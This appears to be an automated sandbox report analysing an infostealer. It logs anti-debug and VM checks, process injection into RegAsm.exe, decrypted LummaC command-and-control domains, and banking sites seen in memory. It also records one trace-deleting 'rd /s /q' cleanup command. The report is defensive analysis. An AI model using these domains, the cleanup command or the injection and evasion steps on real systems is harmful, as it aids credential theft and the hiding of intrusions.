Source: RegAsm.exe, 00000003.00000002.1384359989.000000000146D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.1483311475.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1938989194.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1938989194.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000EDB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AAFIDG.29.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: AAFIDG.29.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.33.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: AAFIDG.29.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.33.dr	Binary or memory string: vmci.sys
Source: AAFIDG.29.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: AAFIDG.29.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: AAFIDG.29.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: AAFIDG.29.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.33.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.33.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.33.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.33.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000EDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: AAFIDG.29.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.33.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.33.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.33.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: AAFIDG.29.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.33.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.33.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.33.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.33.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: AAFIDG.29.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: AAFIDG.29.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.33.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.33.dr	Binary or memory string: VMware Virtual USB Mouse
Source: AAFIDG.29.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.33.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.33.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.33.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.33.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.33.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.33.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`#G
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: AAFIDG.29.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.33.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.33.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWpK
Source: AAFIDG.29.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: AAFIDG.29.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.33.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.33.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: AAFIDG.29.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.33.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.33.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh3
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: AAFIDG.29.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000146D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWA
Source: AAFIDG.29.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_0043C800 LdrInitializeThunk,

24_2_0043C800

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0041ACFA

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00404610 VirtualProtect ?,00000004,00000100,00000000

3_2_00404610

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004195E0

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00419160 mov eax, dword ptr fs:[00000030h]		3_2_00419160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00415E38 mov eax, dword ptr fs:[00000030h]		29_2_00415E38

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

3_2_00405000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041C8D9 SetUnhandledExceptionFilter,	3_2_0041C8D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041ACFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041A718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB7B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6CB7B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CB7B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CB7B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CD2AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CD2AC62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041C8F8 SetUnhandledExceptionFilter,	29_2_0041C8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041AD5F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	29_2_0041AD5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041A724 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_0041A724
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6C9EB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	29_2_6C9EB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6C9EB1F7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_6C9EB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CB9AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_6CB9AC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

0_2_032C24A1

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: userFBKFCFBFID.exe, 00000012.00000002.1378322625.0000000003E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	3_2_004190A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040FD2A _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	29_2_0040FD2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040FE05 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	29_2_0040FE05

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E22008	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F82008	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 84F008	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8AF008
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63B000
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63C000
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BDD008

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKFCFBFID.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIEHDAFHDHC.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userFBKFCFBFID.exe "C:\Users\userFBKFCFBFID.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userIEHDAFHDHC.exe "C:\Users\userIEHDAFHDHC.exe"	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\DHCGHDHIDH.exe "C:\ProgramData\DHCGHDHIDH.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\HDAFIIDAKJ.exe "C:\ProgramData\HDAFIIDAKJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIIJDHCGCBK" & exit	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

29_2_6CAC1C30

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6CB7B341 cpuid

3_2_6CB7B341

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		3_2_00417630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		29_2_0040E910

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Queries volume information: C:\Users\userFBKFCFBFID.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Queries volume information: C:\Users\userIEHDAFHDHC.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Queries volume information: C:\ProgramData\DHCGHDHIDH.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\HDAFIIDAKJ.exe	Queries volume information: C:\ProgramData\HDAFIIDAKJ.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
